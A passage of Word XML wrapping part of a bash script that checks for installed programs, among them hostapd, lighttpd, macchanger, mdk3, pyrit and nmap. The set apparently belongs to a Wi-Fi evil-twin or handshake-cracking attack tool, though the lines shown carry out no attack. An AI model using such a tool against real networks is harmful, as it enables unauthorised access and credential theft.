    <w:p w14:paraId="07380F61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir" (isc-dhcp-server)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB2B676" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0E8583" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B24D8B8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AD46C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D41B50" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31288B01" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B696F04" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Hostapd........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D4DB80" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash hostapd 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF57877" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B6B90" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FA3060" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311ED481" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CB15A2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3809A73E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6561C29F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72744A71" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Iwconfig........"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7258B47A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash iwconfig 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5010AE05" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF0DFD7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C815C4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7F82B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF835C2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3333066E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478A7138" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="25264138" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Lighttpd........"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0CCF2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash lighttpd 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE34451" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC0C08C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A7B511" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDA30E8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993050D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4835BC95" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50907971" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FD1AC" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Macchanger......"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156B835C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash macchanger 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589B2C06" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F4C695" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70732B40" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F3063" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">    echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FFFC70" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4484308D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E475F3A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="331CEAEB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Mdk3............"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776D11B5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash mdk3 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4D52E1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67713A9B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE24756" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD7B82F" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC1CC5A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C9541D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ACB7F3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A19AFD5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Nmap............"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567B4DF4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! [ -f /usr/bin/nmap ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536A5FBB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E77DD3" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D2C8E9" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32729ADE" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABF2D0" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F104B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4770FB77" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="546BE590" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Php5-cgi........"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A529D47" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! [ -f /usr/bin/php-cgi ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E689012" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6BF63A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D1FA4C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BE664" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A424752" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB6E915" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7318B1BA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15672A61" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Pyrit..........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D17DD1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash pyrit 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD485B4" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101A2EDF" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5784EABD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212E4AAD" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F3858D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24571644" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFDF057" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA17F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Python.........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70754653" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash python 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E17CCD2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52197911" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364666C8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E1C5D2" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016EE7DA" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C15284" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11874DE6" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC43B86" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Unzip..........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192C400A" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash unzip 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A16BE1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B46753" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BECAF5E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4210AFA5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152F2895" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D349539" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754D9547" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C64C260" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "Xterm..........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0081A0D7" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash xterm 2&gt;/dev/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080401EB" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCA557D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193E5579" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0761AF81" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4996ADF5" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C7A24" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>sleep 0.025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7206890C" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC4869E" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>echo -ne "OpenSSL........."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316D65F1" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>if ! hash openssl 2&gt;/tmp/null; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CECA2D8" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;31mNot installed"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D301F92" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>salir=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A37FB7B" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B7768D" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>echo -e "\e[1;32mOK!"$yenidenrenklendir""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BC308" w14:textId="77777777" w:rsidR="00E211F4" w:rsidRDefault="00E211F4" w:rsidP="00E211F4">
      <w:r>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
